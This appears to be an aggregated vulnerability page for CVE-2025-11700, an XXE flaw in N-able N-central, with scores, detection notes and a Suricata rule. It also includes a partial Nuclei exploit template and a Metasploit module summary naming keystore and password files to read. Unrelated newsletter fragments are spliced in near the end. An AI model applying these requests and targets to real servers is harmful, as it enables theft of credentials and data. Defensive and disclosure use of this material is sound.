CVE-2025-11700
published 2025-11-12CVE-2025-11700: N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure
PriorityP183high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
31.04%
98.0th percentile
N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| n-able | n-central | < 2025.4 | 2025.4 |
Detection & IOCsextracted from sources · hover to see the quote
url/dms/services/ServerUI
url/dms/services/ServerMMS
commandns1:applianceLogSubmit
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)"; flow:established,to_server; http.uri; content:"/dms/services/ServerMMS"; fast_pattern; http.request_body; content:"ns1:applianceLogSubmit"; content:"|3c 21|ENTITY|20|"; pcre:"/^\s*?(?:\x26\x23(?:x25|37)\x3b|\x25|[a-z]+)\x20[a-z]+\x20[A-Z]+\x20[\x22\x27][^\x22]*[\x22\x27]\x3e/R"; reference:url,horizon3.ai/attack-research/attack-blogs/n-able-n-central-from-n-days-to-0-days/; reference:cve,2025-11700; classtype:web-application-attack; sid:2065811; rev:1; metadata:affected_product N_Able, attack_target Server, tls_state TLSDecrypt, created_at 2025_11_18, cve CVE_2025_11700, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|3c 21|ENTITY|20|
- →The XXE payload is base64-encoded and submitted as the log content field; look for base64-encoded XML DOCTYPE/ENTITY declarations in the body of requests to /dms/services/ServerMMS.
- →The Nuclei template confirms exploitation by checking for a DNS interaction via interactsh, indicating out-of-band XXE exfiltration; monitor for unexpected DNS lookups originating from N-Central servers.
- →The Metasploit module exploits CVE-2025-9316 (auth bypass) first via sessionHello SOAP to ServerMMS with various appliance IDs, then triggers XXE via importServiceTemplateFromFile; correlate unauthenticated sessionHello requests with subsequent XXE activity. ↗
- →Snort/Suricata rule SID 2065811 targets TLS-decrypted traffic; deploy with SSLDecrypt/TLSDecrypt capability to detect this attack at the perimeter or internally.
- →Sensitive files targeted by the XXE read primitive include the PostgreSQL dump, encrypted keystore, and keystore master password — monitor file access to these paths on N-Central hosts. ↗
- ·The Snort rule requires TLS decryption (TLSDecrypt/SSLDecrypt) to be effective, as N-Central traffic is served over HTTPS (HTTP/2); without TLS inspection the rule will not fire.
- ·Affected versions are strictly N-Central < 2025.4.0.9; instances already patched to 2025.4 or later are not vulnerable. ↗
- ·Full exploitation of CVE-2025-11700 (XXE) in the Metasploit module is chained with CVE-2025-9316 (unauthenticated session bypass); detections focused solely on authenticated XXE may miss unauthenticated exploitation paths. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv4.08.4HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.4HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-89f8-292w-gfh4: N-central versions < 2025
ghsa_unreviewed·2025-11-12
CVE-2025-11700 [HIGH] CWE-611 GHSA-89f8-292w-gfh4: N-central versions < 2025
N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure
VulnCheck
N-able N-Central Improper Restriction of XML External Entity Reference
vulncheck·2025·CVSS 8.4
CVE-2025-11700 [HIGH] N-able N-Central Improper Restriction of XML External Entity Reference
N-able N-Central Improper Restriction of XML External Entity Reference
N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure
Affected: N-able N-Central
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-11700
Exploit PoC: https://vulncheck.com/xdb/685f9ef57d2b
Suricata
ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)
suricata·2025-11-18·CVSS 8.4
CVE-2025-11700 [HIGH] ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)
ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)"; flow:established,to_server; http.uri; content:"/dms/services/ServerMMS"; fast_pattern; http.request_body; content:"ns1:applianceLogSubmit"; content:"|3c 21|ENTITY|20|"; pcre:"/^\s*?(?:\x26\x23(?:x25|37)\x3b|\x25|[a-z]+)\x20[a-z]+\x20[A-Z]+\x20[\x22\x27][^\x22]*[\x22\x27]\x3e/R"; reference:url,horizon3.ai/attack-research/attack-blogs/n-able-n-central-from-n-days-to-0-days/; reference:cve,2025-11700; classtype:web-application-attack; sid:2065811; rev:1; metadata:affected_product N_Able, attack_target Server, tls_state
Nuclei
N-central - XML External Entities Injection
nuclei·CVSS 8.4
CVE-2025-11700 [HIGH] N-central - XML External Entities Injection
N-central - XML External Entities Injection
N-central versions
%xxe;
]>
{{rand}}
http:
- raw:
- |
POST /dms/services/ServerUI HTTP/2
Host: {{Hostname}}
Content-Type: text/xml
Soapaction: ""
3
matchers-condition: and
matchers:
- type: word
words:
- SessionID
- sessionHelloResponse
condition: and
internal: true
- type: status
status:
- 200
internal: true
extractors:
- type: regex
part: body
name: sessionid
group: 1
regex:
- ']*>(\d+)'
- '(\d+)'
- '(\d+)'
internal: true
- raw:
- |
POST /dms/services/ServerMMS HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml; charset=utf-8
{{sessionid}}
NETWORK_CHECK_LOG
{{base64(xxe_payload)}}
matchers-condition: and
matchers:
- type: word
words:
- Ok
- Msg
condition: and
internal: true
- raw:
- |
POST /dms/service
Metasploit
N-able N-Central Authentication Bypass and XXE Scanner
metasploit·CVSS 8.4
CVE-2025-9316 [HIGH] N-able N-Central Authentication Bypass and XXE Scanner
N-able N-Central Authentication Bypass and XXE Scanner
This module scans for vulnerable N-able N-Central instances affected by CVE-2025-9316 (Unauthenticated Session Bypass) and CVE-2025-11700 (XXE). The module attempts to exploit CVE-2025-9316 by sending a sessionHello SOAP request to the ServerMMS endpoint with various appliance IDs to obtain an unauthenticated session. If successful, it then tests for CVE-2025-11700 by writing an XXE payload file and triggering it via importServiceTemplateFromFile. Files of interest that can be read via XXE: - /opt/nable/var/ncsai/etc/ncbackup.conf - /var/opt/n-central/tmp/ncbackup/ncbackup.bin (PostgreSQL dump) - /opt/nable/etc/keystore.bcfks (encrypted keystore) - /opt/nable/etc/masterPassword (keystore password) Affected versions: N-Central < 2025.4
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Greynoiseio
NoiseLetter November 2025
blogs_greynoiseio
NoiseLetter November 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2025-11-12
Published
Exploited in the wild